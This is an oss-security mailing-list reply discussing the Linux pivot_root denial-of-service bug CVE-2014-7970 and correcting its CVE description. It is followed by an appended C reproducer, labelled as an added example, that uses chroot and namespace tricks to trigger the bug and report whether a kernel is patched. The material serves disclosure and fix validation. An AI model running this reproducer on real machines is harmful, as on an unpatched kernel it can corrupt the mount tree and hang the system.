Date: Fri, 17 Oct 2014 17:32:13 -0700
From: Andy Lutomirski <luto@...capital.net>
To: oss-security@...ts.openwall.com
Subject: Re: CVE-2014-7970: Linux VFS denial of service

On 10/08/2014 12:48 PM, Andy Lutomirski wrote:
> pivot_root has a bug. Exploiting it at all is tricky, but it can be
> done. I'm reasonably confident that this is just denial of service.
> (There's also probably an information disclosure in there, but I think
> that it's only available to root, so it's not a big deal.)
>
> I'm posting this a little bit early, since a patch is publicly
> available, the impact is low, and hitting the bad code path at all is
> quite tedious. I'll send a proof of concept later on.
>
> Distros: if you need a test case to validate the fix, let me know.
> Although, for validation, it should be sufficient to just chroot
> somewhere as root, escape the chroot (while still chrooted), and then
> pivot_root(".", ".") on a mountpoint.
>
> Candidate patch here:
>
> http://news.gmane.org/find-root.php?message_id=87bnpmihks.fsf%40x220.int.ebiederm.org
>

The mitre.org description is:

The pivot_root implementation in fs/namespace.c in the Linux kernel through 3.17 does not properly interact with certain locations of a chroot directory, which allows local users to cause a denial of service (mount-tree loop) via . (dot) values in both arguments to the pivot_root system call.

This is a bit misleading. Passing "." to both arguments of the pivot_root system call is a perfectly fine (albeit brain-bending) thing to do. The bug was that, if either argument to pivot_root referred to a directory outside of the calling process's chroot, then pivot_root would malfunction, corrupting the mount tree.

--Andy
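The validation recipe in the quoted message (chroot as root, keep the working directory outside the chroot, then call pivot_root(".", ".") on a mount point) as a runnable C reproducer. This is an added example, not Andy's proof of concept and not part of the kernel patch. It does everything inside a private mount namespace forked off in a child, so a kernel that still has the bug can only corrupt that child's mount tree; even so, run it only on a throwaway VM, because an unfixed kernel may hang the child on exit. The temporary paths, the result codes, and the expectation that a fixed kernel answers EINVAL (the fix makes pivot_root require new_root to be reachable from the caller's root) are this example's own assumptions. Note that pivot_root also requires the caller's root to itself be a mount point, so the chroot target is bind-mounted on itself before the chroot.

```c
/* Added example: reproduce the pre-condition described for CVE-2014-7970.
 * Assumptions (not from the original post): paths under /tmp, the result
 * codes below, and that a fixed kernel rejects the call with EINVAL.
 */
#define _GNU_SOURCE
#include <errno.h>
#include <sched.h>
#include <stdio.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <unistd.h>

enum repro_result {
    REPRO_REJECTED = 0,   /* pivot_root failed with EINVAL: kernel has the fix   */
    REPRO_SKIPPED  = 1,   /* not root / no CAP_SYS_ADMIN: could not set up       */
    REPRO_ACCEPTED = 2,   /* pivot_root succeeded: mount tree of the child looped */
    REPRO_OTHER    = 3    /* unexpected failure, details on stderr               */
};

static const char *MNT  = "/tmp/cve-2014-7970-mnt";       /* example path */
static const char *JAIL = "/tmp/cve-2014-7970-mnt/jail";  /* example path */

static int pivot_root_syscall(const char *new_root, const char *put_old)
{
    return (int)syscall(SYS_pivot_root, new_root, put_old);  /* no libc wrapper */
}

/* Everything below runs in a forked child so a looped mount tree dies with it. */
static int child_body(void)
{
    /* 1. private mount namespace: mounts made here never reach the host tree */
    if (unshare(CLONE_NEWNS) != 0)
        return REPRO_SKIPPED;
    if (mount("none", "/", NULL, MS_REC | MS_PRIVATE, NULL) != 0)
        return REPRO_SKIPPED;

    /* 2. a mount point outside the jail (MNT) and a mount point to chroot into
     *    (JAIL): both are plain directories bind-mounted onto themselves       */
    if (mkdir(MNT, 0755) != 0 && errno != EEXIST)
        return REPRO_OTHER;
    if (mount(MNT, MNT, NULL, MS_BIND, NULL) != 0)
        return REPRO_SKIPPED;
    if (mkdir(JAIL, 0755) != 0 && errno != EEXIST)
        return REPRO_OTHER;
    if (mount(JAIL, JAIL, NULL, MS_BIND, NULL) != 0)
        return REPRO_SKIPPED;

    /* 3. chroot WITHOUT a following chdir: the working directory stays at
     *    MNT, which the new root (JAIL) cannot reach, i.e. "escaped while
     *    still chrooted"                                                   */
    if (chdir(MNT) != 0)
        return REPRO_OTHER;
    if (chroot(JAIL) != 0)
        return REPRO_SKIPPED;

    /* 4. the call from the post: both arguments are ".", a mount point that
     *    lies outside the caller's root                                      */
    if (pivot_root_syscall(".", ".") == 0)
        return REPRO_ACCEPTED;
    if (errno == EINVAL)
        return REPRO_REJECTED;
    perror("pivot_root");
    return REPRO_OTHER;
}

/* Runs the reproducer in a child and reports one of the repro_result codes. */
int run_repro(void)
{
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return REPRO_OTHER;
    if (pid == 0)
        _exit(child_body());
    if (waitpid(pid, &status, 0) != pid || !WIFEXITED(status))
        return REPRO_OTHER;
    /* the child's mounts vanished with its namespace; remove the directories */
    rmdir(JAIL);
    rmdir(MNT);
    return WEXITSTATUS(status);
}

int main(void)
{
    static const char *names[] = {
        "rejected with EINVAL: this kernel has the pivot_root fix",
        "skipped: rerun as root with CAP_SYS_ADMIN (throwaway VM!)",
        "ACCEPTED: mount tree looped, this kernel is vulnerable",
        "unexpected error",
    };
    int r = run_repro();
    printf("%s\n", names[r]);
    return r;
}
```

Build with `gcc -Wall -o pivot-repro pivot-repro.c` and run as root. Without CAP_SYS_ADMIN the program stops at unshare() or the first bind mount and reports "skipped" rather than guessing; on a kernel carrying the fix it reports EINVAL, which is the distro validation outcome the post asks for.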